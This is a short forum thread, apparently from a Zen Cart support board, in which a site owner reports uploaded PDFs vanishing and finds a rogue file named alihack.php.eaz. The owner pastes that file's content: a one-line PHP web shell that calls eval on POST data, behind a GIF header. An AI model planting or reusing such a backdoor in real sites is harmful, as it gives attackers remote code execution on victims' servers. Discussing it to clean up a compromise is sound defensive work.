Files go missing from folder

Hi all,

Have an issue with pdf files that I have uploaded to my site. The problem is that all the files that I have uploaded and working ok on the site get deleted after one or two days. I have since noticed a file in the directory which I did not place there called the following alihack.php.eaz Has anyone had this happen to there site.

Any help would be appreciated.

Well, the name of the rogue file suggests your site has been hacked, though most likely not through Zencart. Have you changed your control panel and FTP passwords (and user names, if possible)?

I have changed them both but still happening. Here is what is in the file:

GIF89a?lovealihack<?php eval($_POST[alihack.com])?>d

I have deleted it as well but still happening. Only today I had to upload the files again.
